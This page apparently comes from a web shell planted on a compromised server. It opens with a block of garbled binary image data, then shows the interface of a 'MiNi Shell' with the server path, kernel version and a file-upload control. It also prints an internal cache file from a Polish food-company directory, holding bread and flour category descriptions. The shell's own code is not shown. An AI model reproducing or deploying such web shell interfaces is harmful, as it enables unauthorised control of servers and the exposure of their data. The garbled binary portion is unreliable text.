JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/c9/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/cache/c9/c9aa14fecc57bf885e364a0af90ed4e7.bin

a:2:{i:0;a:1:{i:0;a:2:{i:0;a:10:{s:11:"id_category";i:1528;s:9:"id_portal";i:71;s:4:"name";s:13:"Chleb, bułki";s:11:"description";N;s:4:"left";i:141;s:5:"right";i:142;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:7527:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy pieczywo pełnoziarniste jest zdrowsze?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, zawiera więcej błonnika i składników mineralnych.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy dostępne są chleby bezglutenowe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wiele piekarni oferuje wypieki dla osób na diecie bezglutenowej.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy chleb pakowany jest mniej wartościowy?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Nie, proces pakowania wydłuża świeżość, a jakość zależy od składu i technologii wypieku.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak długo zachowuje świeżość świeżo wypiekane pieczywo?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Świeże pieczywo zwykle zachowuje optymalną świeżość 1–3 dni, w zależności od rodzaju i przechowywania. Pakowane wersje lub mrożone paryówki mogą mieć znacznie dłuższy termin przydatności.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy piekarnia może realizować stałe dostawy do restauracji?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wiele piekarni oferuje regularne dostawy dla gastronomii, elastyczne grafiki oraz opcje zamówień hurtowych i private label.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy dostępne są opcje mrożone lub przedpieczone?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, dostawcy oferują mrożone półprodukty, przedpieczone bochenki oraz ciasto mrożone, co ułatwia logistykę i przechowywanie w gastronomii.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii Chleb i bułki: piekarnie, producenci i dostawcy oferujący chleby pszenne, żytnie, pełnoziarniste, bułki, bagietki, pieczywo dietetyczne i ekologiczne oraz usługi dla gastronomii.", "title": "Chleb i bułki – producenci, piekarnie i dostawcy | Jedzenie.info.pl", "keywords": "chleb, bułki, piekarnia, chleby pszenne, chleby żytnie, chleby pełnoziarniste, bułki kajzerki, bagietki, pieczywo bezglutenowe, pieczywo BIO, dostawy do gastronomii, private label", "description_html": "<h1>Chleb i bułki</h1>\n<p>To podstawowy asortyment piekarniczy obecny w codziennej diecie. W tej kategorii znajdziesz producentów, piekarnie i dostawców oferujących chleby pszenne, żytnie, mieszane, pełnoziarniste oraz szeroki wybór bułek i bagietek.</p>\n\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Różnorodność: chleby pszenne, żytnie, mieszane oraz wiele rodzajów bułek i bagietek</li>\n<li>Opcje dietetyczne: pieczywo bezglutenowe, pełnoziarniste i wysokobłonnikowe</li>\n<li>Oferta zarówno piekarni rzemieślniczych, jak i producentów przemysłowych</li>\n<li>Możliwość zamówień dla gastronomii, usługi private label i dostawy</li>\n<li>Chleby BIO i produkty ekologiczne dostępne u wybranych dostawców</li>\n<li>Wersje świeże i pakowane (oraz opcje mrożone/przedpieczone) przedłużające trwałość</li>\n</ul>\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Kategoria „Chleb, bułki” obejmuje tradycyjne i nowoczesne wypieki. Konsumenci oczekują różnorodności smaków, wysokiej jakości składników oraz opcji dostosowanych do diet specjalnych (bezglutenowe, wysokobłonnikowe). Branża łączy tradycję rzemieślniczą z produkcją przemysłową, zapewniając codzienny dostęp do pieczywa.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a title=\"Chleb, bułki\" href=\"https://www.jedzenie.info.pl/firmy/lista/1528_chleb-bulki\" target=\"_blank\" rel=\"noopener\">Chleby pszenne, żytnie, mieszane</a></li>\n  <li>Chleby pełnoziarniste i na zakwasie</li>\n  <li><a title=\"Pieczywo\" href=\"https://www.jedzenie.info.pl/firmy/lista/1527_pieczywo\" target=\"_blank\" rel=\"noopener\">Bułki kajzerki, grahamki, maślane, bagietki</a></li>\n  <li>Pieczywo bezglutenowe i dietetyczne</li>\n  <li><a title=\"Produkty ekologiczne\" href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" target=\"_blank\" rel=\"noopener\">Chleby BIO i rzemieślnicze</a></li>\n  <li>Produkty pakowane i świeżo wypiekane</li>\n  <li>Usługi private label i dostaw do gastronomii</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Ważny jest skład (mąka, zakwas, dodatki), świeżość i jakość wypieku. Coraz większe znaczenie mają certyfikaty BIO, brak polepszaczy i oferta pieczywa dietetycznego. Gastronomia zwraca uwagę na ciągłość dostaw i różnorodność.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Stała współpraca z piekarniami zapewnia dostęp do świeżego pieczywa, zwiększa atrakcyjność oferty i satysfakcję klientów. Pieczywo pakowane umożliwia dłuższy termin przydatności, co zmniejsza straty.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<p>Restauracje zamawiają bułki do burgerów. Sklepy detaliczne oferują chleby BIO i pełnoziarniste. Firmy cateringowe korzystają z bagietek i bułek w zestawach obiadowych.</p>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy pieczywo pełnoziarniste jest zdrowsze?</h3>\n<p>Tak, zawiera więcej błonnika i składników mineralnych.</p>\n<h3>Czy dostępne są chleby bezglutenowe?</h3>\n<p>Tak, wiele piekarni oferuje wypieki dla osób na diecie bezglutenowej.</p>\n<h3>Czy chleb pakowany jest mniej wartościowy?</h3>\n<p>Nie, proces pakowania wydłuża świeżość, a jakość zależy od składu i technologii wypieku.</p>\n<h3>Jak długo zachowuje świeżość świeżo wypiekane pieczywo?</h3>\n<p>Świeże pieczywo zwykle zachowuje optymalną świeżość 1–3 dni, w zależności od rodzaju i przechowywania. Pakowane wersje lub mrożone paryówki mogą mieć znacznie dłuższy termin przydatności.</p>\n<h3>Czy piekarnia może realizować stałe dostawy do restauracji?</h3>\n<p>Tak, wiele piekarni oferuje regularne dostawy dla gastronomii, elastyczne grafiki oraz opcje zamówień hurtowych i private label.</p>\n<h3>Czy dostępne są opcje mrożone lub przedpieczone?</h3>\n<p>Tak, dostawcy oferują mrożone półprodukty, przedpieczone bochenki oraz ciasto mrożone, co ułatwia logistykę i przechowywanie w gastronomii.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Pieczywo\" href=\"https://www.jedzenie.info.pl/firmy/lista/1527_pieczywo\" target=\"_blank\" rel=\"noopener\">Pieczywo</a></li>\n  <li><a title=\"Pieczywo chrupkie\" href=\"https://www.jedzenie.info.pl/firmy/lista/1529_pieczywo-chrupkie\" target=\"_blank\" rel=\"noopener\">Pieczywo chrupkie</a></li>\n  <li><a title=\"Pieczywo słodkie\" href=\"https://www.jedzenie.info.pl/firmy/lista/1530_pieczywo-slodkie\" target=\"_blank\" rel=\"noopener\">Pieczywo słodkie</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców chleba i bułek: chleby pszenne, żytnie, pełnoziarniste, bułki, bagietki, pieczywo bezglutenowe i BIO. Sprawdź oferty piekarni i możliwość dostaw dla gastronomii."}}";}i:1;a:10:{s:11:"id_category";i:1539;s:9:"id_portal";i:71;s:4:"name";s:5:"Mąka";s:11:"description";N;s:4:"left";i:163;s:5:"right";i:164;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:7522:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy mąki bezglutenowe są droższe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, zwykle mają wyższą cenę ze względu na proces produkcji i surowiec.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy mąka pełnoziarnista jest zdrowsza?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, zawiera więcej błonnika, witamin i minerałów.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy mąki BIO różnią się od tradycyjnych?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, powstają z upraw ekologicznych i są wolne od chemicznych dodatków.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak należy przechowywać mąkę, aby zachowała świeżość?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Mąkę przechowuje się w suchym, chłodnym miejscu, w szczelnych pojemnikach. Mąki pełnoziarniste i orkiszowe mają krótszą trwałość i warto je zużyć szybciej lub przechowywać w lodówce.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Co oznaczają typy mąki (np. 450, 650, 2000)?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Typ mąki wskazuje zawartość popiołu (minerałów) po spaleniu. Niższe typy (np. 450) są bardziej oczyszczone, wyższe typy (np. 2000) zawierają więcej części otrębów i składników mineralnych.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy można zamieniać mąki między sobą 1:1 w przepisach?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Nie zawsze. Różne mąki mają inną zawartość białka i chłonności wody. Przy zastępowaniu pszenicy mąkami bezglutenowymi warto stosować mieszanki i dodatki zwiększające spójność ciasta.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii mąka: producenci i dostawcy mąk pszennych, żytni, kukurydzianych, ryżowych, bezglutenowych, BIO oraz mąk specjalistycznych.", "title": "Mąka – producenci, dostawcy i firmy | Jedzenie.info.pl", "keywords": "mąka, mąka pszenna, mąka żytnia, mąka kukurydziana, mąka ryżowa, mąki bezglutenowe, mąki BIO, mąki pełnoziarniste, producent mąki, dostawca mąki", "description_html": "<h1>Mąka</h1>\n<p>To podstawowy produkt sypki, wykorzystywany w piekarnictwie, cukiernictwie, gastronomii i kuchni domowej. W tej kategorii znajdziesz producentów i dostawców mąki pszennej, żytniej, kukurydzianej, ryżowej oraz wielu innych rodzajów.</p>\n\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Podstawowy surowiec do wypieku chleba, ciast, makaronów i innych produktów piekarniczych</li>\n<li>Różne rodzaje: pszenna, żytnia, orkiszowa, kukurydziana, ryżowa oraz mąki specjalistyczne</li>\n<li>Dostępne mąki BIO i bezglutenowe, odpowiednie dla diet specjalnych</li>\n<li>Typ mąki (np. 450, 650, 2000) i zawartość glutenu wpływają na zastosowanie</li>\n<li>Firmy oferują pakowania detaliczne i hurtowe, private label oraz usługi eksportowe</li>\n</ul>\n\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Mąka jest niezbędnym surowcem do wypieku chleba, ciast, makaronów i wielu dań. Na rynku dostępne są zarówno tradycyjne mąki pszenne i żytnie, jak i nowoczesne alternatywy – mąki bezglutenowe, BIO czy wysokobiałkowe. Wartość rynku rośnie wraz z trendem zdrowej i zróżnicowanej diety.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1539_maka\" title=\"Mąka\" target=\"_blank\" rel=\"noopener\">Mąka</a> pszenna, żytnia, orkiszowa</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1539_maka\" title=\"Mąka\" target=\"_blank\" rel=\"noopener\">Mąka</a> kukurydziana, ryżowa, gryczana</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1539_maka\" title=\"Mąki\" target=\"_blank\" rel=\"noopener\">Mąki</a> bezglutenowe (migdałowa, kokosowa)</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1539_maka\" title=\"Mąki\" target=\"_blank\" rel=\"noopener\">Mąki</a> BIO i pełnoziarniste</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1539_maka\" title=\"Mąki\" target=\"_blank\" rel=\"noopener\">Mąki</a> specjalistyczne: wysokobiałkowe, funkcjonalne</li>\n  <li>Produkty detaliczne i hurtowe</li>\n  <li>Usługi private label i eksportowe</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Kluczowe są rodzaj zboża, typ mąki (np. 450, 650, 2000), zawartość glutenu, certyfikaty jakości i świeżość. Gastronomia zwraca uwagę na stabilność dostaw i formę pakowania.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Mąka to produkt uniwersalny, o szerokim zastosowaniu. Dzięki ofercie BIO i bezglutenowej firmy mogą poszerzyć grono odbiorców i wzmocnić wizerunek.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<p>Piekarnie stosują mąkę pszenną i żytnią do wypieków. Cukiernie używają mąki migdałowej do ciast. Gastronomia wybiera mąki bezglutenowe do menu specjalistycznego. Sklepy detaliczne oferują mąki BIO i pełnoziarniste.</p>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy mąki bezglutenowe są droższe?</h3>\n<p>Tak, zwykle mają wyższą cenę ze względu na proces produkcji i surowiec.</p>\n<h3>Czy mąka pełnoziarnista jest zdrowsza?</h3>\n<p>Tak, zawiera więcej błonnika, witamin i minerałów.</p>\n<h3>Czy mąki BIO różnią się od tradycyjnych?</h3>\n<p>Tak, powstają z upraw ekologicznych i są wolne od chemicznych dodatków.</p>\n<h3>Jak należy przechowywać mąkę, aby zachowała świeżość?</h3>\n<p>Mąkę przechowuje się w suchym, chłodnym miejscu, w szczelnych pojemnikach. Mąki pełnoziarniste i orkiszowe mają krótszą trwałość i warto je zużyć szybciej lub przechowywać w lodówce.</p>\n<h3>Co oznaczają typy mąki (np. 450, 650, 2000)?</h3>\n<p>Typ mąki wskazuje zawartość popiołu (minerałów) po spaleniu. Niższe typy (np. 450) są bardziej oczyszczone, wyższe typy (np. 2000) zawierają więcej części otrębów i składników mineralnych.</p>\n<h3>Czy można zamieniać mąki między sobą 1:1 w przepisach?</h3>\n<p>Nie zawsze. Różne mąki mają inną zawartość białka i chłonności wody. Przy zastępowaniu pszenicy mąkami bezglutenowymi warto stosować mieszanki i dodatki zwiększające spójność ciasta.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Kasza\" href=\"https://www.jedzenie.info.pl/firmy/lista/1538_kasza\" target=\"_blank\" rel=\"noopener\">Kasza</a></li>\n  <li><a title=\"Otręby, musli\" href=\"https://www.jedzenie.info.pl/firmy/lista/1540_otreby-musli\" target=\"_blank\" rel=\"noopener\">Otręby, musli</a></li>\n  <li><a title=\"Pieczywo\" href=\"https://www.jedzenie.info.pl/firmy/lista/1527_pieczywo\" target=\"_blank\" rel=\"noopener\">Pieczywo</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców mąki: pszennej, żytniej, kukurydzianej, ryżowej, bezglutenowej i BIO. Oferty detaliczne i hurtowe, private label i eksport."}}";}}}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:5:{i:0;s:13:"company_77153";i:1;s:19:"presentation_112799";i:2;s:32:"presentation_112799_contact_data";i:3;s:18:"company_77153_tabs";i:4;s:40:"presentation_112799_industries_and_range";}s:4:"data";a:5:{s:32:"b445e4a5f1918cc0a441ed8451abf33c";s:21:"0.74147100 1747713014";s:32:"414cdf4cda0722b2fc6174414e01733b";s:21:"0.74147100 1747713014";s:32:"865bcf7901ddd251f3a5d77fdc959c4b";s:21:"0.74147100 1747713014";s:32:"85b9b999900d54600287bbf85cc0c75d";s:21:"0.74147100 1747713014";s:32:"052f7bc3bf96873b907686fa71389818";s:21:"0.04245700 1754861163";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com